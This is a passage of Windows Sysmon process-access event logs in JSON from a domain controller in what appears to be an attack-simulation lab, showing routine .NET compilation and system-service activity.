08:07:27.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-0010E0B70900}","TargetProcessId":"3060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8330,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:28.693\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 2008\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22C0-5F25-0000-0010AE711100}\r\nTargetProcessId: 1972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:28.693","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"2008","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22C0-5F25-0000-0010AE711100}","TargetProcessId":"1972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8331,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:28.693\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22C0-5F25-0000-0010AE711100}\r\nTargetProcessId: 1972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:28.693","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22C0-5F25-0000-0010AE711100}","TargetProcessId":"1972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8332,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:28.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22C0-5F25-0000-0010AE711100}\r\nTargetProcessId: 1972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:28.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22C0-5F25-0000-0010AE711100}","TargetProcessId":"1972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8333,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:28.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:28.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8334,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:29.068\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 2008\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-229A-5F25-0000-0010000F1000}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:29.068","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"2008","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-229A-5F25-0000-0010000F1000}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8335,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:29.068\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-229A-5F25-0000-0010000F1000}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:29.068","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-229A-5F25-0000-0010000F1000}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8336,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:29.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22C1-5F25-0000-001041751100}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:29.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22C1-5F25-0000-001041751100}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8337,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:29.350\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 4808\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22C1-5F25-0000-001088781100}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 